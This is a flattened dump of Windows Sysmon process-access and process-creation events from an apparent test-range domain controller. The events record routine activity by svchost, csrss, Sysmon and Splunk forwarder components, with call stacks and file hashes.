15:59:11.903{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007113Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:11.903{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007112Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:11.903{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007111Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:11.903{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007110Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:11.903{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007109Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:11.903{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007108Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:11.903{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007107Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:11.903{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7E4F-5FA1-8E01-000000008801}2880C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007106Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:11.903{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7E4F-5FA1-8E01-000000008801}2880C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007105Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:11.903{D28789B6-7E4F-5FA1-8E01-000000008801}2880C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007104Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:11.200{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7E4F-5FA1-8D01-000000008801}1012C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007103Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:11.200{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007102Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:11.200{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007101Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:11.200{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007100Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:11.200{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007099Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:11.200{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007098Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:11.200{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007097Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:11.200{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007096Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:11.200{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007095Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:11.200{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007094Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:11.200{D28789B6-7C62-5FA1-0500-000000008801}6441152C:\Windows\system32\csrss.exe{D28789B6-7E4F-5FA1-8D01-000000008801}1012C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007093Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:11.200{D28789B6-7CDA-5FA1-0E01-000000008801}15923548C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7E4F-5FA1-8D01-000000008801}1012C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000007092Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:11.200{D28789B6-7E4F-5FA1-8D01-000000008801}1012C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{D28789B6-7CDA-5FA1-0E01-000000008801}1592C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000007131Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:12.434{D28789B6-7CDA-5FA1-1201-000000008801}38764476C:\Windows\system32\conhost.exe{D28789B6-7E50-5FA1-8F01-000000008801}2480C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007130Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:12.434{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007129Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:59:12.434{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007128Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 